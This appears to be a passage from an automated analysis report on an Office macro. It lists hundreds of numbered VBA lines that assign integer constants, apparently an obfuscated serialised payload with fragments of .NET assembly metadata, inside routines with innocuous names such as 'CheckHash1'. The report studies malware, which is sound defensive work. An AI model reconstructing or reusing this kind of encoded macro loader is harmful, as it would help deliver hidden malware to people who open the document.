                            1086

                            Y = 678428675

                            1087

                            Y = 167772179

                            1088

                            Y = - 562952180

                            1089

                            Y = 678428675

                            1090

                            Y = 167772179

                            1091

                            Y = - 59635700

                            1092

                            Y = 678428675

                            1093

                            Y = 167772179

                            1094

                            Y = 7481356

                            1095

                            Y = 387516928

                            1096

                            Y = 6771

                            1097

                            Y = 7566090

                            1098

                            Y = 369756672

                            1099

                            Y = 219547155

                            1100

                            Y = 369365782

                            1101

                            Y = - 986184429

                            1102

                            Y = 100663296

                            1103

                            Y = 29807

                            1104

                            Y = 285610762

                            1105

                            Y = 187897348

                            1106

                            Y = 386729489

                            1107

                            Y = - 1388837869

                            1108

                            Y = 285212672

                            1109

                            Y = 137562374

                            1110

                            Y = 1477903377

                            1111

                            Y = 1596654611

                            1112

                            Y = 823591953

                            1113

                            Y = 745670717

                            1114

                            Y = 292552708

                            1115

                            Y = 7677956

                            1116

                            Y = 1148324352

                            1117

                            Y = 678428676

                            1118

                            Y = 167772206

                            1119

                            Y = 1248987148

                            1120

                            Y = 158334980

                            1121

                            Y = 29992

                            1122

                            Y = 71594506

                            1123

                            Y = 774402048

                            1124

                            Y = 201981952

                            1125

                            Y = 72380936

                            1126

                            Y = 321417216

                            1127

                            Y = 201981952

                            1128

                            Y = 1913132843

                            1129

                            Y = 1879049290

                            1130

                            Y = 7677961

                            1131

                            Y = 1148324352

                            1132

                            Y = 678428676

                            1133

                            Y = 167772206

                            1134

                            Y = 218501388

                            1135

                            Y = 100930327

                            1136

                            Y = 30319

                            1137

                            Y = 7827210

                            1138

                            Y = 2099712

                            1139

                            Y = 1778384912

                            1140

                            Y = 1778717019

                            1141

                            Y = 1913137713

                            1142

                            Y = 1879049310

                            1143

                            Y = 4904

                            1144

                            Y = 1913129994

                            1145

                            Y = 1879049330

                            1146

                            Y = 1965557009

                            1147

                            Y = 1913257984

                            1148

                            Y = 1879049284

                            1149

                            Y = 11816

                            1150

                            Y = 85003274

                            1151

                            Y = 85153815

                            1152

                            Y = 7761670

                            1153

                            Y = 2003765760

                            1154

                            Y = 101318656

                            1155

                            Y = 30319

                            1156

                            Y = 7892746

                            1157

                            Y = 541002240

                            1158

                            Y = 301989887

                            1159

                            Y = 1026627332

                            1160

                            Y = 70021640

                            1161

                            Y = 68251648

                            1162

                            Y = 29992

                            1163

                            Y = 71594506

                            1164

                            Y = 774402048

                            1165

                            Y = 201981952

                            1166

                            Y = 71987720

                            1167

                            Y = 671707136

                            1168

                            Y = 167772277

                            1169

                            Y = 279666

                            1170

                            Y = 3025008

                            1171

                            Y = 135006720

                            1172

                            Y = 282738

                            1173

                            Y = 1255536

                            1174

                            Y = 722209280

                            1175

                            Y = 1248987159

                            1176

                            Y = 158334980

                            1177

                            Y = 29992

                            1178

                            Y = 71594506

                            1179

                            Y = 774402048

                            1180

                            Y = 201981952

                            1181

                            Y = 73298440

                            1182

                            Y = 321417216

                            1183

                            Y = 201981952

                            1184

                            Y = 77492744

                            1185

                            Y = 321417216

                            1186

                            Y = 201981952

                            1187

                            Y = 81424904

                            1188

                            Y = 321417216

                            1189

                            Y = 201981952

                            1190

                            Y = 83915272

                            1191

                            Y = 321417216

                            1192

                            Y = 201981952

                            1193

                            Y = 91255304

                            1194

                            Y = 321417216

                            1195

                            Y = 201981952

                            1196

                            Y = 94138888

                            1197

                            Y = 321417216

                            1198

                            Y = 201981952

                            1199

                            Y = 99512840

                            1200

                            Y = 321417216

                            1201

                            Y = 201981952

                            1202

                            Y = 386208022

                            1203

                            Y = 319296345

                            1204

                            Y = 136194823

                            1205

                            Y = 398450

                            1206

                            Y = 671551856

                            1207

                            Y = 167772277

                            1208

                            Y = 406130

                            1209

                            Y = 3025008

                            1210

                            Y = 286001664

                            1211

                            Y = 324540167

                            1212

                            Y = 285675783

                            1213

                            Y = 148648200

                            1214

                            Y = 408690

                            1215

                            Y = 1255536

                            1216

                            Y = 135006720

                            1217

                            Y = 414322

                            1218

                            Y = 1255536

                            1219

                            Y = 135006720

                            1220

                            Y = 418930

                            1221

                            Y = 1255536

                            1222

                            Y = 135006720

                            1223

                            Y = 428146

                            1224

                            Y = 1255536

                            1225

                            Y = 135006720

                            1226

                            Y = 286322

                            1227

                            Y = 1255536

                            1228

                            Y = 34343424

                            1229

                            Y = 949512

                            1230

                            Y = 705168384

                            1231

                            Y = 1112167234

                            1232

                            Y = 65537

                            1233

                            Y = 0

                            1234

                            Y = 12

                            1235

                            Y = 808333942

                            1236

                            Y = 925906222

                            1237

                            Y = 14130

                            1238

                            Y = 327680

                            1239

                            Y = 108

                            1240

                            Y = 2352

                            1241

                            Y = 32291

                            1242

                            Y = 2460

                            1243

                            Y = 3200

                            1244

                            Y = 1920226083

                            1245

                            Y = 1936158313

                            1246

                            Y = 0

                            1247

                            Y = 5660

                            1248

                            Y = 1684

                            1249

                            Y = 5461283

                            1250

                            Y = 7344

                            1251

                            Y = 16

                            1252

                            Y = 1230325539

                            1253

                            Y = 68

                            1254

                            Y = 7360

                            1255

                            Y = 1108

                            1256

                            Y = 1869365795

                            1257

                            Y = 98

                            1258

                            Y = 0

                            1259

                            Y = 16777218

                            1260

                            Y = 161619287

                            1261

                            Y = 9

                            1262

                            Y = 858126848

                            1263

                            Y = 5632

                            1264

                            Y = 1

                            1265

                            Y = 81

                            1266

                            Y = 5

                            1267

                            Y = 18

                            1268

                            Y = 24

                            1269

                            Y = 16

                            1270

                            Y = 132

                            1271

                            Y = 2

                            1272

                            Y = 17

                            1273

                            Y = 20

                            1274

                            For I = 1 To 2

                            1275

                            Y = 2

                            1276

                            Next

                            1277

                            Y = 4

                            1278

                            Y = 2

                            1279

                            Y = 1

                            1280

                            Y = 7

                            1281

                            Y = 208601088

                            1282

                            Y = 1

                            1283

                            Y = 393216

                            1284

                            Y = 5570652

                            1285

                            Y = 20250630

                            1286

                            Y = 393508

                            1287

                            Y = 19136860

                            1288

                            Y = 29294606

                            1289

                            Y = 917929

                            1290

                            Y = 27853344

                            1291

                            Y = 40828946

                            1292

                            Y = 393809

                            1293

                            Y = 45482705

                            1294

                            Y = 50135046

                            1295

                            Y = 655445

                            1296

                            Y = 51643195

                            1297

                            Y = 57212934

                            1298

                            Y = 393508

                            1299

                            Y = 58327946

                            1300

                            Y = 60555270

                            1301

                            Y = 1442084

                            1302

                            Y = 61473391

                            1303

                            Y = 63307786

                            1304

                            Y = 394004

                            1305

                            Y = 5571550

                            1306

                            Y = 66125830

                            1307

                            Y = 655445

                            1308

                            Y = 1246211

                            1309

                            Y = 68878346

                            1310

                            Y = 394004

                            1311

                            Y = 70714435

                            1312

                            Y = 74055686

                            1313

                            Y = 655445

                            1314

                            Y = 1246337

                            1315

                            Y = 78774278

                            1316

                            Y = 394408

                            1317

                            Y = 78120125

                            1318

                            Y = 80084998

                            1319

                            Y = 394408

                            1320

                            Y = 5571793

                            1321

                            Y = 81461254

                            1322

                            Y = 918696

                            1323

                            Y = 27854056

                            1324

                            Y = 86900742

                            1325

                            Y = 394408

                            1326

                            Y = 78120270

                            1327

                            Y = 90570758

                            1328

                            Y = 394408

                            1329

                            Y = 78120326

                            1330

                            Y = 94502918

                            1331

                            Y = 394408

                            1332

                            Y = 78120364

                            1333

                            Y = 96600070

                            1334

                            Y = 394408

                            1335

                            Y = 78120435

                            1336

                            Y = 100597770

                            1337

                            Y = 655379

                            1338

                            Y = 1246731

                            1339

                            Y = 102563846

                            1340

                            Y = 394408

                            1341

                            Y = 104466010

                            1342

                            Y = 108724230

                            1343

                            Y = 1179733

                            1344

                            Y = 38864513

                            1345

                            Y = 109969426

                            1346

                            Y = 393809

                            1347

                            Y = 5572262

                            1348

                            Y = 113246214

                            1349

                            Y = 1181358

                            1350

                            Y = 38864595

                            1351

                            Y = 119996442

                            1352

                            Y = 1705745

                            1353

                            Y = 118556500

                            1354

                            Y = 126222342

                            1355

                            Y = 394408

                            1356

                            Y = 5572495

                            1357

                            Y = 127402002

                            1358

                            Y = 1966673

                            1359

                            Y = 127993783

                            1360

                            Y = 130154526

                            1361

                            Y = 395169

                            1362

                            Y = 5572558

                            1363

                            Y = 131530783

                            1364

                            Y = 655360

                            1365

                            Y = 140052598

                            1366

                            Y = 145227794

                            1367

                            Y = 1966673

                            1368

                            Y = 127994057

                            1369

                            Y = 148963358

                            1370

                            Y = 1968033

                            1371

                            Y = 127994092

                            1372

                            Y = 151650334

                            1373

                            Y = 1968033

                            1374

                            Y = 127994141

                            1375

                            Y = 154730526

                            1376

                            Y = 395169

                            1377

                            Y = 45484531

                            1378

                            Y = 168427538

                            1379

                            Y = 1180241

                            1380

                            Y = 38865456

                            1381

                            Y = 175767562

                            1382

                            Y = 394004

                            1383

                            Y = 5573279

                            1384

                            Y = 180027398

                            1385

                            Y = 394408

                            1386

                            Y = 184617748

                            1387

                            Y = 187171095

                            1388

                            Y = 393216

                            1389

                            Y = 104467255

                            1390

                            Y = 190251014

                            1391

                            Y = 394810

                            1392

                            Y = 112069493

                            1393

                            Y = 196149254

                            1394

                            Y = 396178

                            1395

                            Y = 194120639

                            1396

                            Y = 198377478

                            1397

                            Y = 394926

                            1398

                            Y = 112069614

                            1399

                            Y = 201916422

                            1400

                            Y = 394926

                            1401

                            Y = 112069666

                            1402

                            Y = 205193222

                            1403

                            Y = 394926

                            1404

                            Y = 112069720

                            1405

                            Y = 0

                            1406

                            Y = 1

                            1407

                            Y = 65536

                            1408

                            Y = 16777217

                            1409

                            Y = 2686992

                            1410

                            Y = 327729

                            1411

                            Y = 65537

                            1412

                            Y = 1048832

                            1413

                            Y = 3211323

                            1414

                            Y = 327685

                            1415

                            Y = 65544

                            1416

                            Y = 4194304

                            1417

                            Y = 327729

                            1418

                            Y = 786443

                            1419

                            Y = 1

                            1420

                            Y = 3211340

                            1421

                            Y = 786437

                            1422

                            Y = 1441809

                            1423

                            Y = 1507434

                            1424

                            Y = 7798806

                            1425

                            Y = 1441815

                            1426

                            Y = 1507459

                            1427

                            Y = 8912918

                            1428

                            Y = - 2142175209

                            1429

                            Y = 1507610

                            1430

                            Y = 20643857

                            1431

                            Y = 1114195

                            1432

                            Y = 5439818

                            1433

                            Y = 4980753

                            1434

                            Y = 1114199

                            1435

                            Y = 5963840

                            1436

                            Y = 23199761

                            1437

                            Y = 65631

                            1438

                            Y = 7078352

                            1439

                            Y = 41615361

                            1440

                            Y = - 2142175088

                            1441

                            Y = 9699967

                            1442

                            Y = 42926081

                            1443

                            Y = 65559

                            1444

                            Y = 7078352

                            1445

                            Y = 44367873

                            1446

                            Y = 65696

                            1447

                            Y = 9700011

                            1448

                            Y = 47710209

                            1449

                            Y = 567017636

                            1450

                            Y = 0

                            1451

                            Y = 6494225

                            1452

                            Y = 65555

                            1453

                            Y = 8696

                            1454

                            Y = 1441792

                            1455

                            Y = 1704081

                            1456

                            Y = 576192513

                            1457

                            Y = 0

                            1458

                            Y = 11141142

                            1459

                            Y = 131103

                            1460

                            Y = 8856

                            1461

                            Y = 1441792

                            1462

                            Y = 2490565

                            1463

                            Y = 584843267

                            1464

                            Y = 0

                            1465

                            Y = 14221334

                            1466

                            Y = 262170

                            1467

                            Y = 8984

                            1468

                            Y = 1441792

                            1469

                            Y = 1704168

                            1470

                            Y = 591921157

                            1471

                            Y = 0

                            1472

                            Y = 16318486

                            1473

                            Y = 393260

                            1474

                            Y = 8272

                            1475

                            Y = 403767296

                            1476

                            Y = 1245283

                            1477

                            Y = 543948808

                            1478

                            Y = 0

                            1479

                            Y = 3866646

                            1480

                            Y = 524307

                            1481

                            Y = 8508

                            1482

                            Y = 1114112

                            1483

                            Y = 6488426

                            1484

                            Y = 562298888

                            1485

                            Y = 0

                            1486

                            Y = 25690129

                            1487

                            Y = 589923

                            1488

                            Y = 9124

                            1489

                            Y = 403046400

                            1490

                            Y = 6816163

                            1491

                            Y = 599261194

                            1492

                            Y = 0

                            1493

                            Y = 31591233

                            1494

                            Y = 655472

                            1495

                            Y = 9164

                            1496

                            Y = 188809248

                            1497

                            Y = 7668215

                            1498

                            Y = 605552650

                            1499

                            Y = 0

                            1500

                            Y = 35389446

                            1501

                            Y = 721000

                            1502

                            Y = 9312

                            1503

                            Y = 65536

                            1504

                            Y = 8061488

                            1505

                            Y = 640942091

                            1506

                            Y = 0

                            1507

                            Y = 27465734

                            1508

                            Y = 852072

                            1509

                            Y = 9828

                            1510

                            Y = 188809216

                            1511

                            Y = 7340514

                            1512

                            Y = 645398541

                            1513

                            Y = 2097152

                            1514

                            Y = 32967489

                            1515

                            Y = 852085

                            1516

                            Y = 9924

                            1517

                            Y = 393216

                            1518

                            Y = 6816284

                            1519

                            Y = 670564366

                            1520

                            Y = 0

                            1521

                            Y = 43843585

                            1522

                            Y = 917660

                            1523

                            Y = 10296

                            1524

                            Y = 65536

                            1525

                            Y = 8061488

                            1526

                            Y = 770965518

                            1527

                            Y = 0

                            1528

                            Y = 48168961

                            1529

                            Y = 1048747

                            1530

                            Y = 11892

                            1531

                            Y = 65536

                            1532

                            Y = 11535092

                            1533

                            Y = 17

                            1534

                            Y = 10878977

                            1535

                            Y = 65536

                            1536

                            Y = 191

                            1537

                            Y = 12517377

                            1538

                            Y = 65536

                            1539

                            Y = 166

                            1540

                            Y = 10878977

                            1541

                            Y = 65536

                            1542

                            Y = 270

                            1543

                            Y = 18153474

                            1544

                            Y = 65536

                            1545

                            Y = 386

                            1546

                            Y = 25296897

                            1547

                            Y = 65536

                            1548

                            Y = 524

                            1549

                            Y = 38273025

                            1550

                            Y = 131072

                            1551

                            Y = 591

                            1552

                            Y = 34340865

                            1553

                            Y = 65536

                            1554

                            Y = 584

                            1555

                            Y = 38731778

                            1556

                            Y = 65536

                            1557

                            Y = 1639147

                            1558

                            Y = 11797255

                            1559

                            Y = 54984777

                            1560

                            Y = 4784314

                            1561

                            Y = 1246039

                            1562

                            Y = 27459609

                            1563

                            Y = 5308608

                            1564

                            Y = 6816628

                            1565

                            Y = 59965529

                            1566

                            Y = 6357190

                            1567

                            Y = 13435299

                            1568

                            Y = 27459601

                            1569

                            Y = 6881491

                            1570

                            Y = 1245724

                            1571

                            Y = 62849041

                            1572

                            Y = 7405795

                            1573

                            Y = 6816163

                            1574

                            Y = 27459705

                            1575

                            Y = 8454248

                            1576

                            Y = 15926264

                            1577

                            Y = 67829897

                            1578

                            Y = 8978679

                            1579

                            Y = 16647183

                            1580

                            Y = 68354185

                            1581

                            Y = 8978686

                            1582

                            Y = 16974871

                            1583

                            Y = 69664913

                            1584

                            Y = 8454408

                            1585

                            Y = 17630256

                            1586

                            Y = 72089753

                            1587

                            Y = 8454440

                            1588

                            Y = 19727445

                            1589

                            Y = 73466009

                            1590

                            Y = 10551602

                            1591

                            Y = 2491506

                            1592

                            Y = 76480649

                            1593

                            Y = 10551609

                            1594

                            Y = 21496983

                            1595

                            Y = 27459761

                            1596

                            Y = 11600206

                            1597

                            Y = 22479864

                            1598

                            Y = 81133745

                            1599

                            Y = 13697371

                            1600

                            Y = 6816628

                            1601

                            Y = 81920177

                            1602

                            Y = 590179

                            1603

                            Y = 6816163

                            1604

                            Y = 27459617

                            1605

                            Y = 14221416

                            1606

                            Y = 13435299

                            1607

                            Y = 83558433

                            1608

                            Y = 2163065

                            1609

                            Y = 24708361

                            1610

                            Y = 85196833

                            1611

                            Y = 2162844

                            1612

                            Y = 6817055

                            1613

                            Y = 87556321

                            1614

                            Y = 14745988

                            1615

                            Y = 10224962

                            1616

                            Y = 89653473

                            1617

                            Y = 14745994

                            1618

                            Y = 26150260

                            1619

                            Y = 93651193

                            1620

                            Y = 16842928

                            1621

                            Y = 26478009

                            1622

                            Y = 96928017

                            1623

                            Y = 16842778

                            1624

                            Y = 27133411

                            1625

                            Y = 70254721

                            1626

                            Y = 18416036

                            1627

                            Y = 28050936

                            1628

                            Y = 102170913

                            1629

                            Y = 18416049

                            1630

                            Y = 29034028

                            1631

                            Y = 27459897

                            1632

                            Y = 786603

                            1633

                            Y = 6816163

                            1634

                            Y = 110625097

                            1635

                            Y = 23134716

                            1636

                            Y = 33687240

                            1637

                            Y = 57934161

                            1638

                            Y = 21561863

                            1639

                            Y = 34014926

                            1640

                            Y = 27459945

                            1641

                            Y = 21561448

                            1642

                            Y = 34670308

                            1643

                            Y = 116392265

                            1644

                            Y = 21561873

                            1645

                            Y = 34998077

                            1646

                            Y = 124387657

                            1647

                            Y = 21561885

                            1648

                            Y = 11536253

                            1649

                            Y = 27459969

                            1650

                            Y = 16318635

                            1651

                            Y = 37029858

                            1652

                            Y = 133366153

                            1653

                            Y = 27853371

                            1654

                            Y = 15927297

                            1655

                            Y = 134939049

                            1656

                            Y = 27853043

                            1657

                            Y = 15927319

                            1658

                            Y = 136511913

                            1659

                            Y = 16318707

                            1660

                            Y = 37029940

                            1661

                            Y = 138871033

                            1662

                            Y = 28901941

                            1663

                            Y = 37816457

                            1664

                            Y = 143786257

                            1665

                            Y = 8454170

                            1666

                            Y = 38077488

                            1667

                            Y = 144572697

                            1668

                            Y = 22086220

                            1669

                            Y = 38996131

                            1670

                            Y = 69664913

                            1671

                            Y = 29426297

                            1672

                            Y = 15927474

                            1673

                            Y = 146866625

                            1674

                            Y = 29426302

                            1675

                            Y = 44304595

                            1676

                            Y = 150536657

                            1677

                            Y = 31523498

                            1678

                            Y = 45091096

                            1679

                            Y = 153747945

                            1680

                            Y = 32572087

                            1681

                            Y = 11209029

                            1682

                            Y = 156434881

                            1683

                            Y = 25755752

                            1684

                            Y = 15927640

                            1685

                            Y = 157352329

                            1686

                            Y = 25756349

                            1687

                            Y = 15927658

                            1688

                            Y = 158663049

                            1689

                            Y = 25756349

                            1690

                            Y = 15927680

                            1691

                            Y = 160104841

                            1692

                            Y = 25756349

                            1693

                            Y = 15927702

                            1694

                            Y = 161874313

                            1695

                            Y = 16319165

                            1696

                            Y = 46401974

                            1697

                            Y = 164036857

                            1698

                            Y = 16319172

                            1699

                            Y = 46402010

                            1700

                            Y = 166461721

                            1701

                            Y = 29426379

                            1702

                            Y = 34014068

                            1703

                            Y = 167837708

                            1704

                            Y = 21562064

                            1705

                            Y = 47909398

                            1706

                            Y = 170263041

                            1707

                            Y = 33620211

                            1708

                            Y = 48302651

                            1709

                            Y = 172229129

                            1710

                            Y = 786608

                            1711

                            Y = 48761421

                            1712

                            Y = 173735956

                            1713

                            Y = 17892089

                            1714

                            Y = 1706599

                            1715

                            Y = 175374473

                            1716

                            Y = 34668570

                            1717

                            Y = 50203268

                            1718

                            Y = 177340428

                            1719

                            Y = 1311493

                            1720

                            Y = 10226326

                            1721

                            Y = 178979353

                            1722

                            Y = 786536

                            1723

                            Y = 51055283

                            1724

                            Y = 125633033

                            1725

                            Y = 34144432

                            1726

                            Y = 6818284

                            1727

                            Y = 180879465

                            1728

                            Y = 35717697

                            1729

                            Y = 58917283

                            1730

                            Y = 182125089

                            1731

                            Y = 9502963

                            1732

                            Y = 59311143

                            1733

                            Y = 182780449

                            1734

                            Y = 13697934

                            1735

                            Y = 22481652

                            1736

                            Y = 66584785

                            1737

                            Y = 36241751

                            1738

                            Y = 60883363

                            1739

                            Y = 27460153

                            1740

                            Y = 37815208

                            1741

                            Y = 6816163

                            1742

                            Y = 27460169

                            1743

                            Y = 38863019

                            1744

                            Y = 11207075

                            1745

                            Y = 27460185

                            1746

                            Y = 39911953

                            1747

                            Y = 11207075

                            1748

                            Y = 27460201

                            1749

                            Y = 40960171

                            1750

                            Y = 11207075

                            1751

                            Y = 27460217

                            1752

                            Y = 42008747

                            1753

                            Y = 11207075

                            1754

                            Y = 27460233

                            1755

                            Y = 917675

                            1756

                            Y = 3276820

                            1757

                            Y = 3407880

                            1758

                            Y = 3014807

                            1759

                            Y = 64881635

                            1760

                            Y = 69402670

                            1761

                            Y = 3015734

                            1762

                            Y = 68486131

                            1763

                            Y = 68878382

                            1764

                            Y = 3015734

                            1765

                            Y = 62260179

                            1766

                            Y = 64684078

                            1767

                            Y = 3015615

                            1768

                            Y = 65733611

                            1769

                            Y = 63635502

                            1770

                            Y = 3015597

                            1771

                            Y = 68486139

                            1772

                            Y = 67305518

                            1773

                            Y = 3015701

                            1774

                            Y = 68486155

                            1775

                            Y = 68354094

                            1776

                            Y = 4391963

                            1777

                            Y = 15597659

                            1778

                            Y = 5963875

                            1779

                            Y = 18874606

                            1780

                            Y = 15597667

                            1781

                            Y = 26411361

                            1782

                            Y = 31523296

                            1783

                            Y = 31457683

                            1784

                            Y = 15270108

                            1785

                            Y = 18022633

                            1786

                            Y = 18809114

                            1787

                            Y = 21233988

                            1788

                            Y = 24379755

                            1789

                            Y = 15270271

                            1790

                            Y = 24379843

                            1791

                            Y = 35914111

                            1792

                            Y = 51446318

                            1793

                            Y = 59966334

                            1794

                            Y = 65540

                            1795

                            Y = 131077

                            1796

                            Y = 29294592

                            1797

                            Y = 130

                            1798

                            Y = 8520127

                            1799

                            Y = 851970

                            1800

                            Y = 65539

                            1801

                            Y = 196622

                            1802

                            Y = 1179650

                            1803

                            Y = 65541

                            1804

                            Y = 327699

                            1805

                            Y = 49414646

                            1806

                            Y = 32772

                            1807

                            Y = 1

                            1808

                            For I = 1 To 2

                            1809

                            Y = 0

                            1810

                            Next

                            1811

                            Y = 3211264

                            1812

                            Y = 131072

                            1813

                            For I = 1 To 2

                            1814

                            Y = 0

                            1815

                            Next

                            1816

                            Y = 65536

                            1817

                            Y = 10

                            1818

                            Y = 524288

                            1819

                            For I = 1 To 2

                            1820

                            Y = 0

                            1821

                            Next

                            1822

                            Y = 655360

                            1823

                            Y = 19

                            1824

                            Y = 131072

                            1825

                            For I = 1 To 2

                            1826

                            Y = 0

                            1827

                            Next

                            1828

                            Y = 65536

                            1829

                            Y = 85

                            1830

                            Y = 917504

                            1831

                            For I = 1 To 2

                            1832

                            Y = 0

                            1833

                            Next

                            1834

                            Y = 8847360

                            1835

                            Y = 593

                            1836

                            Y = 131072

                            1837

                            For I = 1 To 2

                            1838

                            Y = 0

                            1839

                            Next

                            1840

                            Y = 65536

                            1841

                            Y = 938

                            1842

                            Y = 917504

                            1843

                            For I = 1 To 2

                            1844

                            Y = 0

                            1845

                            Next

                            1846

                            Y = 8847360

                            1847

                            Y = 1802

                            1848

                            Y = 917504

                            1849

                            For I = 1 To 2

                            1850

                            Y = 0

                            1851

                            Next

                            1852

                            Y = 8847360

                            1853

                            Y = 1953

                            1854

                            Y = 0

                            1855

                            Y = 1867332608

                            1856

                            Y = 1701606756

                            1857

                            Y = 1936523326

                            1858

                            Y = 1819438947

                            1859

                            Y = 1291870825

                            1860

                            Y = 1869767529

                            1861

                            Y = 1952870259

                            1862

                            Y = 1936283182

                            1863

                            Y = 1114399093

                            1864

                            Y = 1667855201

                            1865

                            Y = 1869367040

                            1866

                            Y = 1936482658

                            1867

                            Y = 1920230144

                            1868

                            Y = 1851879532

                            1869

                            Y = 1291873381

                            1870

                            Y = 7235937

                            1871

                            Y = 1735748688

                            1872

                            Y = 1816358505

                            1873

                            Y = 7566177

                            1874

                            Y = 1128350294

                            1875

                            Y = 1936941420

                            1876

                            Y = 1937330944

                            1877

                            Y = 7169396

                            1878

                            Y = 1701470799

                            1879

                            Y = 771781731

                            1880

                            Y = 1869898595

                            1881

                            Y = 1381957746

                            1882

                            Y = 1699964773

                            1883

                            Y = 1769108835

                            1884

                            Y = 1593866612

                            1885

                            Y = 1332176210

                            1886

                            Y = 1869182064

                            1887

                            Y = 1593865070

                            1888

                            Y = 4411204

                            1889

                            Y = 1869566559

                            1890

                            Y = 1919501428

                            1891

                            Y = 1668171008

                            1892

                            Y = 1600480367

                            1893

                            Y = 1868784964

                            1894

                            Y = 1398760804

                            1895

                            Y = 1852404340

                            1896

                            Y = 1951596647

                            1897

                            Y = 1850015858

                            1898

                            Y = 1701080931

                            1899

                            Y = 1667581023

                            1900

                            Y = 1600480367

                            1901

                            Y = 1702132034

                            1902

                            Y = 1107309171

                            1903

                            Y = 1936028793

                            1904

                            Y = 1668171008

                            1905

                            Y = 1600480367

                            1906

                            Y = 1868784964

                            1907

                            Y = 1113548132

                            1908

                            Y = 1936028793

                            1909

                            Y = 1668171008

                            1910

                            Y = 1415930991

                            1911

                            Y = 1935753839

                            1912

                            Y = 3421797

                            1913

                            Y = 1868784964

                            1914

                            Y = 1917216100

                            1915

                            Y = 1631743343

                            1916

                            Y = 875980147

                            1917

                            Y = 1886339840

                            1918

                            Y = 1684947321

                            1919

                            Y = 1868787269

                            1920

                            Y = 1147102564

                            1921

                            Y = 1685021541

                            1922

                            Y = 1867710565

                            1923

                            Y = 1701016181

                            1924

                            Y = 1936016384

                            1925

                            Y = 1967980660

                            1926

                            Y = 1316513140

                            1927

                            Y = 6647137

                            1928

                            Y = 1953724755

                            1929

                            Y = 1412328805

                            1930

                            Y = 1634038376

                            1931

                            Y = 1735289188

                            1932

                            Y = 1835619328

                            1933

                            Y = 1442869861

                            1934

                            Y = 1816346946

                            1935

                            Y = 1601401697

                            1936

                            Y = 1701669204

                            1937

                            End Sub

                            LineInstructionMeta Information
                            1938

                            Private Sub CheckHash1()

                            1939

                            Y = 1817182322

                            executed
                            1940

                            Y = 1852401525

                            1941

                            Y = 1935764547

                            1942

                            Y = 1767137139

                            1943

                            Y = 7497069

                            1944

                            Y = 1702131021

                            1945

                            Y = 2035089528

                            1946

                            Y = 1702131021

                            1947

                            Y = 1112932472

                            1948

                            Y = 1634485057

                            1949

                            Y = 1415541619

                            1950

                            Y = 1919249769

                            1951

                            Y = 1818313567

                            1952

                            Y = 1667318380

                            1953

                            Y = 1953693803

                            1954

                            Y = 6648929

                            1955

                            Y = 1735748688

                            1956

                            Y = 1816358505

                            1957

                            Y = 1601401697

                            1958

                            Y = 1701669204

                            1959

                            Y = 1631805298

                            1960

                            Y = 1631743084

                            1961

                            Y = 771779427

                            1962

                            Y = 1919906915

                            1963

                            Y = 1937330944

                            1964

                            Y = 778921332

                            1965

                            Y = 1886220099

                            1966

                            Y = 1852141167

                            1967

                            Y = 1685015924

                            1968

                            Y = 1107324005

                            1969

                            Y = 1735091041

                            1970

                            Y = 1853190002

                            1971

                            Y = 1919899492

                            1972

                            Y = 7497067

                            1973

                            Y = 1667318367

                            1974

                            Y = 1869768555

                            1975

                            Y = 1466199669

                            1976

                            Y = 1701540463

                            1977

                            Y = 1701249138

                            1978

                            Y = 1631739764

                            1979

                            Y = 1919380323

                            1980

                            Y = 1684960623

                            1981

                            Y = 1802661719

                            1982

                            Y = 1929409125

                            1983

                            Y = 1113551973

                            1984

                            Y = 1735091041

                            1985

                            Y = 1853190002

                            1986

                            Y = 1919899492

                            1987

                            Y = 7497067

                            1988

                            Y = 1752459607

                            1989

                            Y = 1852143173

                            1990

                            Y = 1633055604

                            1991

                            Y = 6649196

                            1992

                            Y = 7238994

                            1993

                            Y = 1868001092

                            1994

                            Y = 1984260978

                            1995

                            Y = 1098149477

                            1996

                            Y = 7563122

                            1997

                            Y = 1801675074

                            1998

                            Y = 1970238055

                            1999

                            Y = 1867998318

                            2000

                            Y = 1919249266

                            2001

                            Y = 1466909791

                            2002

                            Y = 7041647

                            2003

                            Y = 1684956531

                            2004

                            Y = 1694528101

                            2005

                            Y = 1667845376

                            2006

                            Y = 1869836146

                            2007

                            Y = 1328444518

                            2008

                            Y = 1667851878

                            2009

                            Y = 1850289765

                            2010

                            Y = 1869768052

                            2011

                            Y = 1867984496

                            2012

                            Y = 1090544754

                            2013

                            Y = 1768714352

                            2014

                            Y = 1769234787

                            2015

                            Y = 1090547311

                            2016

                            Y = 1459646576

                            2017

                            Y = 1667321188

                            2018

                            Y = 1866755954

                            2019

                            Y = 1701672291

                            2020

                            Y = 1291875438

                            2021

                            Y = 1919112057

                            2022

                            Y = 1131704425

                            2023

                            Y = 1701340001

                            2024

                            Y = 1098074368

                            2025

                            Y = 1263497328

                            2026

                            Y = 1818838528

                            2027

                            Y = 1174434661

                            2028

                            Y = 1936026729

                            2029

                            Y = 1701080649

                            2030

                            Y = 2035482744

                            2031

                            Y = 1835365491

                            2032

                            Y = 1819231022

                            2033

                            Y = 1952671084

                            2034

                            Y = 1936617321

                            2035

                            Y = 1852131118

                            2036

                            Y = 1667854949

                            2037

                            Y = 1936280576

                            2038

                            Y = 3235956

                            2039

                            Y = 1986622020

                            2040

                            Y = 1124103013

                            2041

                            Y = 1918985580

                            2042

                            Y = 1701012818

                            2043

                            Y = 1174434926

                            2044

                            Y = 1315269737

                            2045

                            Y = 6647137

                            2046

                            Y = 1666414925

                            2047

                            Y = 1953524082

                            2048

                            Y = 1668826368

                            2049

                            Y = 1769238629

                            2050

                            Y = 1325428335

                            2051

                            Y = 1164862832

                            2052

                            Y = 1953720696

                            2053

                            Y = 6778473

                            2054

                            Y = 1919117645

                            2055

                            Y = 1718580079

                            2056

                            Y = 1767255668

                            2057

                            Y = 1818326387

                            2058

                            Y = 1769169218

                            2059

                            Y = 1866673763

                            2060

                            Y = 1818849389

                            2061

                            Y = 1699967589

                            2062

                            Y = 1667855986

                            2063

                            Y = 1342206821

                            2064

                            Y = 1701474162

                            2065

                            Y = 1631876195

                            2066

                            Y = 1392533876

                            2067

                            Y = 1917875301

                            2068

                            Y = 1667590767

                            2069

                            Y = 1920091508

                            2070

                            Y = 1124102767

                            2071

                            Y = 1918985580

                            2072

                            Y = 1785688656

                            2073

                            Y = 1165255525

                            2074

                            Y = 1919906418

                            2075

                            Y = 1767986944

                            2076

                            Y = 1851869300

                            2077

                            Y = 6646884

                            2078

                            Y = 1936682051

                            2079

                            Y = 1766654053

                            2080

                            Y = 1936683619

                            2081

                            Y = 779380335

                            2082

                            Y = 862873943

                            2083

                            Y = 1699872818

                            2084

                            Y = 1953720679

                            2085

                            Y = 1392540018

                            2086

                            Y = 1633055845

                            2087

